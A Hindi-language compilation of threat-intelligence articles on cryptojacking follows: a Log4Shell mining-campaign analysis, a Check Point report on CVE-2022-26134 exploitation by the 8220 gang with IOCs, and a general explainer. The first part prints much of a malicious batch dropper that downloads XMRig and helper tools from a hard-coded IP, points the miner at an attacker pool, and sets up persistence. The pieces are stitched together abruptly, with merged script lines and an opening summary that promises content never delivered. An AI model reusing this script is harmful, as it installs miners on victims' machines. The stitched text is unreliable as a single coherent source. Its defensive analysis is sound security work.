
Log4Shell (CVE-2021-44228) भेद्यता का शैक्षिक विश्लेषण, क्रिप्टोकरेंसी माइनिंग अभियान में इसके शोषण का विवरण IoCs, MITRE ATT&CK मैपिंग और पहचान मार्गदर्शन के साथ।
अलीबाबा क्लाउड सिक्योरिटी टीम ने सार्वजनिक रूप से एक गंभीर भेद्यता (CVE-2021-44228) का खुलासा किया जो Apache Log4j2 (Log4Shell) के कई संस्करणों के विरुद्ध अप्रमाणित रिमोट कोड निष्पादन को सक्षम बनाती है। कमजोर सर्वरों का शोषण हमलावरों द्वारा किसी भी प्रोटोकॉल जैसे HTTPS के माध्यम से जुड़कर और एक विशेष रूप से तैयार स्ट्रिंग भेजकर किया जा सकता है।
डार्कट्रेस ने कई ग्राहक तैनाती पर क्रिप्टो-माइनिंग का पता लगाया जो इस Log4j भेद्यता के शोषण के परिणामस्वरूप हुआ। इनमें से प्रत्येक घटना में, शोषण आउटबाउंड SSL कनेक्शन के माध्यम से हुआ जो परिधि सुरक्षा को बायपास करने और बैच (.bat) स्क्रिप्ट फ़ाइलों और कई निष्पादन योग्य फ़ाइलों को डाउनलोड करने के लिए बेस64-एन्कोडेड PowerShell स्क्रिप्ट के अनुरोध प्रतीत होते हैं, जो क्रिप्टो-माइनिंग मैलवेयर स्थापित करते हैं। गतिविधि में व्यापक अभियान संकेतक थे, जिनमें सामान्य हार्ड-कोडेड आईपी, निष्पादन योग्य फ़ाइलें और स्क्रिप्ट शामिल हैं।
हमले का चक्र उस चीज़ से शुरू होता है जो इंटरनेट से जुड़े उपकरणों की अवसरवादी स्कैनिंग प्रतीत होती है जो Log4j शोषण के लिए कमजोर VMWare Horizons सर्वरों की तलाश करती है। एक बार कमजोर सर्वर मिल जाने पर, हमलावर पीड़ित के लिए HTTP और SSL कनेक्शन बनाता है। सफल शोषण के बाद, सर्वर पोर्ट 1389 पर कॉलबैक करता है, mad_micky.bat नामक एक स्क्रिप्ट प्राप्त करता है। यह निम्नलिखित प्राप्त करता है:
कम से कम दो मामलों में, mad_micky.bat स्क्रिप्ट को एक HTTP कनेक्शन में प्राप्त किया गया था जिसमें उपयोगकर्ता एजेंट Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS) था। यह पहली और एकमात्र बार था जब इस नेटवर्क पर यह उपयोगकर्ता एजेंट देखा गया था। ऐसा प्रतीत होता है कि यह उपयोगकर्ता एजेंट कुछ ASUS उपकरणों द्वारा ताज़ा फ़ैक्टरी इंस्टॉल के साथ वैध रूप से उपयोग किया जाता है; हालाँकि, एक नए उपयोगकर्ता एजेंट के रूप में जो केवल इस गतिविधि के दौरान देखा गया, यह संदिग्ध है।
सफल शोषण के बाद, सर्वर स्क्रिप्ट फ़ाइलों को पुनः प्राप्त करने के लिए पोर्ट 1389 पर कॉलबैक करता है। इस उदाहरण में, /xms.ps1 एक बेस64-एन्कोडेड PowerShell स्क्रिप्ट है जो ‘mad_micky.bat’ को कॉल करने के लिए होस्ट पर निष्पादन नीति को बायपास करती है:
चित्र 1: PowerShell स्क्रिप्ट xms.ps1 पर अतिरिक्त जानकारी
स्नैपशॉट प्रभावित सर्वर के लिए ईवेंट लॉग का विवरण देता है और सफल Log4j RCE को इंगित करता है जिसके परिणामस्वरूप mad_micky.bat फ़ाइल डाउनलोड हुई:
चित्र 2: mad_micky.bat फ़ाइल को उजागर करने वाला लॉग डेटा
निष्पादन योग्य फ़ाइलों और स्क्रिप्ट को पुनः प्राप्त करने के लिए अतिरिक्त कनेक्शन शुरू किए गए। स्क्रिप्ट में कोरिया और यूक्रेन में स्थित दो आईपी पते थे। यूक्रेनी आईपी से निष्पादन योग्य फ़ाइल xm.exe डाउनलोड करने के लिए एक कनेक्शन बनाया गया, जो माइनर को सक्रिय करता है। माइनर, XMRig Miner (इस मामले में) एक ओपन सोर्स, क्रॉस-प्लेटफ़ॉर्म माइनिंग टूल है जो कई सार्वजनिक स्थानों से डाउनलोड के लिए उपलब्ध है। अगला देखा गया exe डाउनलोड ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4) के लिए था।
चित्र 3: XMRig निष्पादन योग्य के संबंध में अतिरिक्त जानकारी
कोरियाई आईपी से कनेक्शन में एक अन्य स्क्रिप्ट (/2.ps1) के साथ-साथ एक निष्पादन योग्य फ़ाइल (LogBack.exe) का अनुरोध शामिल था। यह स्क्रिप्ट लॉगिंग से जुड़े चल रहे कार्यों को हटाती है, जिसमें SCM ईवेंट लॉग फ़िल्टर या PowerShell ईवेंट लॉग उपभोक्ता शामिल हैं। स्क्रिप्ट Pastebin से एक फ़ाइल का भी अनुरोध करती है, जो संभवतः Cobalt Strike बीकन कॉन्फ़िगरेशन फ़ाइल है। लॉग हटाने का कार्य शेड्यूल किए गए कार्यों और WMI के माध्यम से किया गया, जिसमें शामिल हैं: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer।
Pastebin से अनुरोधित दूसरी फ़ाइल, हालाँकि अब Pastebin द्वारा होस्ट नहीं की गई है, schtasks कमांड का हिस्सा है, और संभवतः दृढ़ता स्थापित करने के लिए उपयोग किया जाता है:
निष्पादन योग्य फ़ाइल Logback.exe एक अन्य XMRig माइनिंग टूल है। उसी कोरियाई आईपी से एक config.json फ़ाइल भी डाउनलोड की गई थी। इसके बाद cmd.exe और wmic कमांड का उपयोग करके माइनर को कॉन्फ़िगर किया गया।
इन फ़ाइल डाउनलोड और माइनर कॉन्फ़िगरेशन के बाद Pastebin से अतिरिक्त कनेक्शन बनाए गए।
चित्र 4: mad_micky.bat फ़ाइल का OSINT सहसंबंध
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
looking for the following utilities: powershell, find, findstr, tasklist, sc
set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log”
if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK)
set port=10001echo [*] Removing previous mimu miner (if any)
sc stop gado_miner
sc delete gado_miner
taskkill /f /t /im xmrig.exe
taskkill /f /t/im logback.exe
taskkill /f /t /im network02.exe
:REMOVE_DIR0
echo [*] Removing “%USERPROFILE%\mimu6” directory
timeout 5
rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL
IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)”
echo copying to mimu directory
if errorlevel 1 (
echo ERROR: Can’t download MoneroOcean advanced version of xmrig
goto MINER_BAD)echo [*] Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6”
powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)”
if errorlevel 1 (
echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
set LOGFILE2=%LOGFILE:\=\\%
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
if %ADMIN% == 1 goto ADMIN_MINER_SETUP
if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” (
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
goto STARTUP_DIR_OK
)
if exist “%USERPROFILE%\Start Menu\Programs\Startup” (
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
goto STARTUP_DIR_OK
)
echo [*] Downloading tools to make gado_miner service to “%USERPROFILE%\nssm.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)”
if errorlevel 1 (
echo ERROR: Can’t download tools to make gado_miner service
exit /b 1इस अभियान की पहचान करने के लिए Darktrace द्वारा उपयोग किए गए प्रमुख मॉडल उल्लंघनों में समझौता-केंद्रित मॉडल शामिल हैं असामान्य पोर्ट पर एप्लिकेशन प्रोटोकॉल, सर्वर से दुर्लभ के लिए आउटगोइंग कनेक्शन, और दुर्लभ गंतव्य के लिए बीकनिंग। फ़ाइल-केंद्रित मॉडल छिपा हुआ फ़ाइल स्थानांतरण, दुर्लभ स्थानों से एकाधिक निष्पादन योग्य फ़ाइलें और स्क्रिप्ट, और दुर्लभ बाहरी स्थान से संपीड़ित सामग्री। क्रिप्टोकरेंसी माइनिंग का पता क्रिप्टोकरेंसी माइनिंग गतिविधि मॉडल के अंतर्गत लगाया जाता है।
दुर्लभ और नए उपयोगकर्ता एजेंट के लिए असामान्य PowerShell से संबंधित मॉडल Log4j कॉलबैक के बाद संक्रमित उपकरणों पर असामान्य कनेक्शन को उजागर करते हैं।
Darktrace की स्वायत्त प्रतिक्रिया तकनीक, Antigena वाले ग्राहकों के पास आने वाली फ़ाइलों और डाउनलोड की गई स्क्रिप्ट को ब्लॉक करने और संक्रमित उपकरणों को सामान्य जीवन पैटर्न तक सीमित करने के लिए कार्रवाई भी थी ताकि प्रारंभिक दुर्भावनापूर्ण फ़ाइल डाउनलोड और चल रही क्रिप्टो-माइनिंग गतिविधि दोनों को रोका जा सके।
31 मई को, एक महत्वपूर्ण अनपैच्ड भेद्यता, जो सभी कन्फ्लुएंस सर्वर और डेटा सेंटर समर्थित संस्करणों को प्रभावित करती है, सुरक्षा कंपनी Volexity द्वारा Atlassian को रिपोर्ट की गई थी।
Atlassian ने 2 जून को महत्वपूर्ण भेद्यता के बारे में अपने ग्राहकों को चेतावनी दी और एक दिन बाद पैच जारी किया। CISA ने 3 जून को इस भेद्यता को अपनी ज्ञात शोषित भेद्यताओं की सूची में जोड़ा।
Check Point ने इस भेद्यता का शोषण करने वाले हमले को रोकने के लिए एक समर्पित सुरक्षा जारी की और ग्राहकों को प्रभावित सिस्टम को पैच करने की सलाह दी।
भेद्यता
Atlassian Confluence और Data Center में भेद्यता, जिसे CVE-2022-26134 नामित किया गया है, एक अप्रमाणित ऑब्जेक्ट-ग्राफ नेविगेशन लैंग्वेज (OGNL) एक्सप्रेशन इंजेक्शन हमले का कारण बन सकती है।
एक दूरस्थ, अप्रमाणित हमलावर URI में एक दुर्भावनापूर्ण पेलोड रखकर लक्ष्य सर्वर पर मनमाना कोड निष्पादित करने के लिए इस भेद्यता का उपयोग कर सकता है।

चित्र 1: दुर्भावनापूर्ण पेलोड जो CVE-2022-26134 का शोषण करता है।
वास्तविक दुनिया में शोषण
Check Point Research (CPR) के शोधकर्ताओं ने भेद्यता प्रकाशित होने के बाद से बड़ी संख्या में शोषण प्रयासों पर ध्यान दिया। पहले तो, कई संभावित हमलावरों ने कमजोर लक्ष्यों की पहचान करने के लिए स्कैनिंग विधियों का उपयोग किया। कुछ दिनों के बाद, हमलावरों ने प्रभावित सिस्टम पर मैलवेयर डाउनलोड करने के लिए भेद्यता का उपयोग करना शुरू कर दिया।
शोषण लॉग के बीच, शोधकर्ताओं ने कुछ दुर्भावनापूर्ण पेलोड देखे जो उसी अभियान से संबंधित हैं और एक ही स्रोत से उत्पन्न हुए लेकिन विभिन्न प्लेटफार्मों: Linux और Windows को लक्षित किया।
संक्रमण श्रृंखला पीड़ित के ऑपरेटिंग सिस्टम पर निर्भर करती है।
लिनक्स OS लक्षित हमला
हमलावर ने पीड़ित को एक तैयार HTTP अनुरोध भेजकर Atlassian 0-दिवसीय भेद्यता का उपयोग किया।

चित्र 2: एक तैयार HTTP अनुरोध जो बेस64-एन्कोडेड पेलोड के साथ CVE-2022-26134 का शोषण करता है।
बेस64 स्ट्रिंग एक अन्य बेस64-एन्कोडेड स्ट्रिंग में डिकोड होती है। कुल मिलाकर, शोधकर्ताओं को वास्तविक पेलोड प्राप्त करने के लिए स्ट्रिंग को कई बार डिकोड करना पड़ा।

चित्र 3: डिकोड की गई बेस64 स्ट्रिंग।
यह स्क्रिप्ट दूरस्थ C&C सर्वर से xms नामक एक bash स्क्रिप्ट फ़ाइल को पीड़ित की tmp फ़ोल्डर में डाउनलोड करती है, उसे निष्पादित करती है, और बाद में हटा देती है।

चित्र 4: दुर्भावनापूर्ण xms स्क्रिप्ट का भाग।
xms फ़ाइल एक ड्रॉपर स्क्रिप्ट है। यह पीड़ित मशीन से चल रहे एजेंटों को अनइंस्टॉल करती है और रीबूट पर स्थायित्व बनाए रखने के लिए स्वयं को cron जॉब्स में जोड़ती है।
इसके अतिरिक्त, a[.]oracleservice.top पर एक नेटवर्क कनेक्टिविटी परीक्षण लगातार किया जाता है।
अन्य मशीनों में फैलने के प्रयास में, स्क्रिप्ट ssh कुंजियाँ खोजती है और कनेक्ट करने का प्रयास करती है। फिर यह C&C सर्वर से xms फ़ाइल डाउनलोड करती है और इसे निष्पादित करती है।
स्क्रिप्ट विभिन्न दूरस्थ आईपी पर tmp फ़ोल्डर में dbused नामक एक elf निष्पादन योग्य फ़ाइल डाउनलोड करती है।
dbused फ़ाइल स्थैतिक पहचान से बचने के लिए upx का उपयोग करके पैक की गई है।
elf फ़ाइल एक क्रिप्टो माइनर है जो पीड़ित मशीन के संसाधनों को समाप्त कर देती है:

चित्र 5: dbused प्रक्रिया सिस्टम संसाधनों को समाप्त करती है।
Windows OS लक्षित हमला
हमलावर ने दूरस्थ C&C सर्वर से फ़ाइलरहित हमला शुरू करने के लिए PowerShell डाउनलोड क्रैडल को निष्पादित करने हेतु Atlassian भेद्यता का उपयोग किया।

चित्र 6: PowerShell कमांड का उपयोग करके CVE-2022-26134 का शोषण करने वाला एक क्राफ्ट किया गया HTTP अनुरोध।
lol.ps1 स्क्रिप्ट एक PowerShell मेमोरी प्रक्रिया में इंजेक्ट की जाती है।
स्क्रिप्ट प्रोसेसर की आर्किटेक्चर को सत्यापित करती है, यह जाँचने के लिए wmi का उपयोग करती है कि यह उसकी आवश्यकताओं से मेल खाता है या नहीं।
फिर यह checkit2 नामक एक निष्पादन योग्य फ़ाइल को tmp फ़ोल्डर में डाउनलोड करती है और इसे छिपे हुए मोड में चलाती है।

चित्र 7: lol.ps1 स्क्रिप्ट।
checkit2.exe प्रक्रिया एक चाइल्ड प्रक्रिया उत्पन्न करती है, जिसे InstallUtil.exe कहा जाता है, जो C&C सर्वर से जुड़ती है। InstallUtil.exe बदले में एक और चाइल्ड प्रक्रिया, AddInProcess.exe, उत्पन्न करता है, जो क्रिप्टो माइनर है। पीड़ित मशीन पर चलने के कुछ क्षणों के बाद, checkit2 प्रक्रिया स्वयं समाप्त हो जाती है।
![]()
चित्र 8: सिस्टम पर चल रही checkit2.exe प्रक्रिया।
![]()
चित्र 9: सिस्टम पर चल रही InstallUtil.exe प्रक्रिया।
मैलवेयर स्टार्ट मेनू फ़ोल्डर में एक नए नाम के साथ अपनी एक नई प्रतिलिपि डाउनलोड करता है।

चित्र 10: स्टार्टअप फ़ोल्डर में डाउनलोड की गई cloud.exe फ़ाइल।
क्रिप्टो माइनर अब मशीन पर चलता है और सिस्टम के सभी संसाधनों को समाप्त कर देता है:
![]()
चित्र 11: क्रिप्टो वॉलेट जानकारी।
हमला श्रृंखला
दोनों हमले परिदृश्य CVE-2022-26134 भेद्यता का शोषण करने वाले प्रारंभिक क्राफ्ट किए गए HTTP अनुरोध से शुरू होते हैं। हमलावर पीड़ित मशीन पर एक दुर्भावनापूर्ण पेलोड डाउनलोड करने के लिए Java निष्पादन फ़ंक्शन का उपयोग करके कमांड निष्पादित करते हैं।
दुर्भावनापूर्ण पेलोड फिर प्रभावित OS के अनुसार एक निष्पादन योग्य फ़ाइल डाउनलोड करता है। दोनों निष्पादन योग्य फ़ाइलें पीड़ित के संसाधनों का उपयोग अपने लाभ के लिए करने के लिए एक क्रिप्टो माइनर चलाती हैं।
खतरे के अभिनेता
a[.]oracleservice.top डोमेन और क्रिप्टो वॉलेट जो हमने सिस्टम से निकाले हैं, "8220 गिरोह" नामक एक साइबर अपराधी समूह से संबंधित हैं।
चेक पॉइंट सुरक्षा:
IPS:
Atlassian Confluence Remote Code Execution (CVE-2022-26134)
Anti-Bot:
Trojan.WIN32.XMRig
IOCs:
198.251.86[.]46
51.79.175[.]139
167.114.114[.]169
146.59.198[.]38
51.255.171[.]23
a.oracleservice[.]top
d2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e
2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0
4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9
4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0
Monero वॉलेट:
46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ
क्रिप्टोजैकिंग क्रिप्टोकरेंसी माइन करने के लिए किसी और के कंप्यूट संसाधनों का अनधिकृत उपयोग है। हैकर्स किसी भी प्रकार के सिस्टम को हाईजैक करने का प्रयास करते हैं जिसे वे अपने कब्जे में ले सकते हैं—डेस्कटॉप, सर्वर, क्लाउड इन्फ्रास्ट्रक्चर और अन्य—अवैध रूप से क्रिप्टो सिक्के माइन करने के लिए।
डिलीवरी तंत्र के बावजूद, क्रिप्टोजैकिंग कोड आमतौर पर पृष्ठभूमि में चुपचाप काम करता है जबकि अनजान पीड़ित अपने सिस्टम का सामान्य रूप से उपयोग करते हैं। वे केवल धीमी गति, निष्पादन में अंतराल, अत्यधिक गर्म होना, अत्यधिक बिजली की खपत, या असामान्य रूप से उच्च क्लाउड कंप्यूटिंग बिल जैसे संकेत देख सकते हैं।
सिक्का माइनिंग क्रिप्टोकरेंसी दुनिया में एक वैध प्रक्रिया है जो नई क्रिप्टोकरेंसी को प्रचलन में लाती है। यह प्रक्रिया पहले माइनर को पुरस्कृत करके काम करती है जो एक जटिल कम्प्यूटेशनल समस्या को हल करता है। वह समस्या सत्यापित लेन-देन के ब्लॉकों को पूरा करती है जो क्रिप्टोकरेंसी ब्लॉकचेन में जोड़े जाते हैं।
"माइनर्स को मूल रूप से अपने ऑडिटर के काम के लिए भुगतान किया जा रहा है। वे बिटकॉइन लेन-देन की वैधता को सत्यापित करने का काम कर रहे हैं," हाल ही में इन्वेस्टोपीडिया के एक व्याख्याकार में बिटकॉइन माइनिंग कैसे काम करता है, इसके बारे में विस्तार से बताया गया है। "माइनर्स की जेबें भरने और बिटकॉइन इकोसिस्टम का समर्थन करने के अलावा, माइनिंग एक और महत्वपूर्ण उद्देश्य पूरा करता है: यह नई क्रिप्टोकरेंसी को प्रचलन में लाने का एकमात्र तरीका है।"
सिक्का माइनिंग के माध्यम से क्रिप्टोकरेंसी अर्जित करने के लिए आमतौर पर भारी मात्रा में प्रोसेसिंग पावर और ऊर्जा की आवश्यकता होती है। इसके अतिरिक्त, क्रिप्टोकरेंसी इकोसिस्टम इस तरह से डिज़ाइन किया गया है कि समय के साथ और अधिक माइनिंग प्रतिस्पर्धा के साथ माइनिंग को कठिन बना दिया जाता है और इसके पुरस्कारों को कम कर दिया जाता है। यह वैध क्रिप्टोकरेंसी सिक्का माइनिंग को एक अत्यंत महंगा मामला बनाता है, जिसमें हर समय खर्च बढ़ता रहता है।
साइबर अपराधी केवल कम्प्यूट और ऊर्जा संसाधनों को चुराकर माइनिंग ओवरहेड को कम करते हैं। वे सिस्टम तक पहुंच प्राप्त करने के लिए हैकिंग तकनीकों की एक श्रृंखला का उपयोग करते हैं जो अवैध रूप से कम्प्यूटेशनल कार्य करेंगे और फिर इन हाईजैक किए गए सिस्टम को हैकर द्वारा नियंत्रित सर्वर पर परिणाम भेजने देते हैं।
हमले के तरीके केवल क्रिप्टोजैकर्स की रचनात्मकता तक सीमित हैं, लेकिन निम्नलिखित आज उपयोग किए जाने वाले सबसे सामान्य तरीकों में से कुछ हैं।
अतीत में, क्रिप्टोजैकिंग मुख्य रूप से एक एंडपॉइंट मैलवेयर खेल था, जो डेस्कटॉप और लैपटॉप पर मैलवेयर गिराने के एक और पैसे कमाने के उद्देश्य के रूप में मौजूद था। पारंपरिक क्रिप्टोजैकिंग मैलवेयर को फ़ाइलरहित मैलवेयर, फ़िशिंग योजनाओं, और वेबसाइटों और वेब ऐप्स में एम्बेडेड दुर्भावनापूर्ण स्क्रिप्ट जैसे सामान्य मार्गों के माध्यम से वितरित किया जाता है।
क्रिप्टोजैकिंग हमलावर संसाधन चुराने का सबसे बुनियादी तरीका एंडपॉइंट उपयोगकर्ताओं को एक वैध दिखने वाला ईमेल भेजना है जो उन्हें एक लिंक पर क्लिक करने के लिए प्रोत्साहित करता है जो उनके कंप्यूटर पर क्रिप्टोमाइनिंग स्क्रिप्ट रखने के लिए कोड चलाता है। यह पृष्ठभूमि में चलता है और कमांड एंड कंट्रोल (C2) बुनियादी ढांचे के माध्यम से परिणाम वापस भेजता है।
एक अन्य विधि किसी वेबसाइट या किसी विज्ञापन पर एक स्क्रिप्ट इंजेक्ट करना है जो कई वेबसाइटों पर दिया जाता है। एक बार जब पीड़ित वेबसाइट पर जाते हैं या संक्रमित विज्ञापन उनके ब्राउज़र में पॉप अप होता है, तो स्क्रिप्ट स्वचालित रूप से निष्पादित हो जाती है। पीड़ितों के कंप्यूटर पर कोई कोड संग्रहीत नहीं होता है।
ये रास्ते अभी भी एक वैध चिंता बने हुए हैं, हालांकि अपराधियों ने लाभ बढ़ाने के प्रयास में अपने क्रिप्टोजैकिंग प्लेबुक में काफी अधिक परिष्कृत तकनीकों को जोड़ा है, इनमें से कुछ विकसित विधियों का वर्णन नीचे किया गया है।
हमलावर सर्वर, नेटवर्क डिवाइसों और यहां तक कि IoT डिवाइसों तक अपने क्षितिज का विस्तार करके क्रिप्टोजैकिंग की लाभप्रदता बढ़ाने का प्रयास करते हैं। उदाहरण के लिए, सर्वर एक विशेष रूप से आकर्षक लक्ष्य हैं क्योंकि वे आम तौर पर एक सामान्य डेस्कटॉप की तुलना में अधिक शक्तिशाली होते हैं। वे 2022 में एक प्रमुख शिकार का मैदान भी हैं क्योंकि बुरे लोग सार्वजनिक इंटरनेट के संपर्क में आने वाले सर्वरों को स्कैन करते हैं जिनमें Log4J जैसी कमजोरियाँ होती हैं, दोष का शोषण करते हैं और हैकर के सर्वर से जुड़े सिस्टम पर चुपचाप क्रिप्टोमाइनिंग सॉफ्टवेयर लोड करते हैं। अक्सर हमलावर अपने क्रिप्टोजैकिंग को शुरू में समझौता किए गए सिस्टम से दूसरे नेटवर्क डिवाइसों में पार्श्व रूप से स्थानांतरित करने के लिए इसका उपयोग करेंगे।
"हम Log4J भेद्यता से उत्पन्न क्रिप्टोमाइनिंग में वृद्धि देख रहे हैं," लॉगरिदम के वरिष्ठ खतरा अनुसंधान इंजीनियर सैली विंसेंट कहती हैं। "हैकर्स नेटवर्क में घुसपैठ कर रहे हैं और मैलवेयर इंस्टॉल कर रहे हैं जो क्रिप्टो माइन करने के लिए स्टोरेज का उपयोग करता है।"
साइबर अपराधी ओपन-सोर्स कोड रिपॉजिटरी में अपने कोड के भीतर एम्बेडेड क्रिप्टोजैकिंग स्क्रिप्ट वाले दुर्भावनापूर्ण पैकेज और लाइब्रेरी बीज करके सॉफ्टवेयर आपूर्ति श्रृंखला को लक्षित कर रहे हैं। दुनिया भर में डेवलपर्स द्वारा लाखों की संख्या में इन पैकेजों को डाउनलोड करने के साथ, ये हमले बुरे लोगों के लिए दो तरह से क्रिप्टोजैकिंग बुनियादी ढांचे को तेजी से बढ़ा सकते हैं। दुर्भावनापूर्ण पैकेजों का उपयोग डेवलपर सिस्टम—और उनसे जुड़े नेटवर्क और क्लाउड संसाधनों—को लक्षित करने के लिए किया जा सकता है ताकि उन्हें सीधे अवैध क्रिप्टोमाइनिंग संसाधनों के रूप में उपयोग किया जा सके। या वे इस सॉफ़्टवेयर को दूषित करने के लिए इन हमलों का लाभ उठा सकते हैं जो ये डेवलपर्स ऐसे घटकों के साथ बना रहे हैं जो किसी एप्लिकेशन के अंतिम उपयोगकर्ता की मशीनों पर क्रिप्टोमाइनिंग स्क्रिप्ट निष्पादित करते हैं।
कई क्रिप्टोजैकिंग उद्यम क्लाउड संसाधनों की मापनीयता का लाभ उठाकर क्लाउड बुनियादी ढांचे में सेंध लगाते हैं और अपनी माइनिंग गतिविधि को शक्ति देने के लिए कंप्यूट पूलों के और भी व्यापक संग्रह में टैप करते हैं। Google की साइबर सिक्योरिटी एक्शन टीम द्वारा पिछली शरद ऋतु में किए गए एक अध्ययन में बताया गया कि 86% समझौता किए गए क्लाउड इंस्टेंस का उपयोग क्रिप्टोमाइनिंग के लिए किया जाता है।
"आज, हमलावर किसी भी तरह से क्लाउड सेवाओं को लक्षित कर रहे हैं ताकि अधिक से अधिक क्रिप्टोकरेंसी माइन की जा सके, क्योंकि क्लाउड सेवाएं उन्हें केवल एक स्थानीय मशीन की तुलना में बड़े पैमाने पर अपनी गणना चलाने की अनुमति दे सकती हैं, चाहे वे किसी उपयोगकर्ता के प्रबंधित क्लाउड वातावरण को अपने कब्जे में ले रहे हों या अपनी गणना को निष्पादित करने के लिए SaaS एप्लिकेशन का दुरुपयोग भी कर रहे हों," पालो ऑल्टो नेटवर्क्स के वरिष्ठ सुरक्षा शोधकर्ता गाय अराजी ने एक ब्लॉग पोस्ट में लिखा।
ऐसा करने के सामान्य तरीकों में से एक उजागर कंटेनर APIs या असुरक्षित क्लाउड स्टोरेज बकेट को स्कैन करना और उस पहुंच का उपयोग प्रभावित कंटेनर इंस्टेंस या क्लाउड सर्वर पर सिक्का-माइनिंग सॉफ्टवेयर लोड करना शुरू करना है। हमला आमतौर पर स्कैनिंग सॉफ्टवेयर के साथ स्वचालित होता है जो सार्वजनिक इंटरनेट के लिए सुलभ सर्वरों को उजागर APIs या अप्रमाणित पहुंच की संभावना के साथ देखता है। हमलावर आमतौर पर माइनर पेलोड को प्रारंभिक सिस्टम पर छोड़ने और जुड़े क्लाउड सिस्टम में फैलने के तरीकों की तलाश करने के लिए स्क्रिप्ट का उपयोग करते हैं।
"बड़े पैमाने पर क्रिप्टोजैकिंग करने की लाभप्रदता और आसानी इस प्रकार के हमले को कम फलदायी बनाती है," कैडो सिक्योरिटी के सुरक्षा शोधकर्ता मैट मुइर ने एक ब्लॉग पोस्ट में समझाया कि क्लाउड-आधारित हमले विशेष रूप से लाभदायक होते हैं। "यह तब तक जारी रहने की संभावना है जब तक उपयोगकर्ता Docker और Redis जैसी सेवाओं को अविश्वसनीय नेटवर्कों में उजागर करना जारी रखते हैं।"
